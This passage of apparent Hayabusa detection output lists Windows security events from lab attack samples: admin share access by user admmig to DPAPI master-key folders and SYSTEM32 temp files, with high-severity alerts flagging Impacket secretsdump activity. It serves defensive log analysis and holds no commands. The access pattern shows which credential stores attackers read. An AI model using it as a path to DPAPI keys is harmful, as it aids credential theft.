2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 
10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 20:53:07.706 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Users | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials 
from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.632 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.648 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.680 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | 
IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.763 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network 
share.evtx 2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.794 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 
